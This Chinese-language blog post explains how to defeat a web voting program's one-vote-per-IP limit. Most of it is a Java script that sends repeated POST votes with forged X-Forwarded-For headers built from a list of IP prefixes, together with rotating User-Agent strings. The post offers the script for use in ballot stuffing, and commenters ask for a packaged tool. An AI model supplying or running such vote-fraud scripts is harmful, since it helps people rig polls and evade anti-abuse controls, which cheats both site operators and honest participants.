投票程序作弊-IP地址任意伪造欺骗限制

作者: 封笔尘缘 分类: 资源分享 发布时间: 2016-6-24 ė2782 次浏览 64 条评论

某WEB投票程序, 使用 ip 限制和cookie限制技术,来限制每个ip每天只能投一次票,使用的是php开发,获取访问者的 ip 使用了搜狐的接口:

http://txt.go.sohu.com/ip/soip

下面是如果突破 ip 限制,达到任意控制投票的 ip ,从而如破 ip 限制:

package com.github.digdeep126;
 
import java.io.OutputStream;
import java.net.MalformedURLException;
import java.net.URL;
import java.net.URLConnection;
import java.util.Random;
 
public class Post {
    public static final String[] ipArrays = {
        "66.102.251.", "112.211.0.", "141.8.225.","159.106.121.",
        "216.58.221.", "61.244.148.", "59.125.39.", "58.30.15.", "114.80.166.",
        "202.96.134.", "58.19.24.", "119.39.23.", "58.195.128.", "124.236.223.",
        "183.221.217.", "222.182.90.", "58.194.96.", "211.138.161.",
        "112.112.13.", "219.159.82.", "202.98.226.", " 61.128.101.",
        "130.039.000.", "130.039.255.", "131.230.000.","131.230.255.",
        "144.092.000.", "144.092.255.", "151.000.000.", "152.255.255.",
        "161.058.000.", "161.058.255.", "169.208.000.", "169.223.255.",
        "171.208.000.", "171.220.255.", "195.010.040.", "195.010.040.",
        "195.010.062.", "195.010.063.", "195.010.194.", "195.010.194.",
        "195.063.159.", "195.063.159.", "195.090.044.", "195.090.046.",
        "195.090.047.", "195.090.048.", "195.090.049.", "195.090.051.",
        "195.090.052.", "195.090.053.", "195.100.066.", "195.112.164.",
        "195.112.172.", "195.112.173."};
     
    public static void main(String[] args) throws Exception{
         
        for(int i=0; i<20; i++){
            Runnable runn = new Runnable() {
                public void run() {
                    try {
                        post();
                    } catch (Exception e) {
                        e.printStackTrace();
                    }
                }
            };
            new Thread(runn).run();
            Thread.sleep(2000);
        }
    }
     
    public static void post() throws Exception{
        URL url = new URL("http://xxxxxxxxxxxx");
        URLConnection con = url.openConnection();
 
        con.setDoOutput(true);
        con.setDoInput(true);
 
        Random r = new Random();
        Integer counter = r.nextInt(255);
         
        int index = r.nextInt(34);
        String ip = ipArrays[index];
         
        con.setRequestProperty("X-Forwarded-For", ip + counter);
        System.out.println(ip+counter);
        con.setRequestProperty("cache-control","max-age=0");
        if(r.nextInt(10) % 2 == 0)
            con.setRequestProperty("User-Agent","Mozilla/5.0 (Windows NT 5.1) AppleWebKit/535.19 (KHTML, like Gecko) Chrome/18.0.1025.142 Safari/535.19");
        else
            con.setRequestProperty("User-Agent","Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0");
         
        con.setUseCaches(false);
 
        OutputStream out = con.getOutputStream();
        out.write(("data=" + xxx).getBytes());
        out.flush();
        out.close();
        con.getInputStream();
    }
}

每运行一次,开了20个线程去 post 提交20次,提交的数据为:data=xxxx,每次提交伪造一个 ip 地址。如破了server 端 PHP 代码中的ip限制。

本文出自 封笔尘缘 ,转载时请注明出处及相应链接。

本文永久链接: http://www.moxcn.com/?post=347

|

4条评论

  1. themebetter 2016-07-08 11:10

    任意投票很简单呀!回复

  1. 滕绍武的博客 2016-07-04 22:51

    做个软件分享一下吧回复

  1. Hopi 2016-06-24 11:13

    [汗][汗][汗]做个软件吧,看不懂回复

    1. 封笔尘缘 2016-06-24 20:01

      @Hopi:有时间再说吧回复

发表评论:

电子邮件地址不会被公开。 必填项已用*标注

Ɣ回顶部
sitemap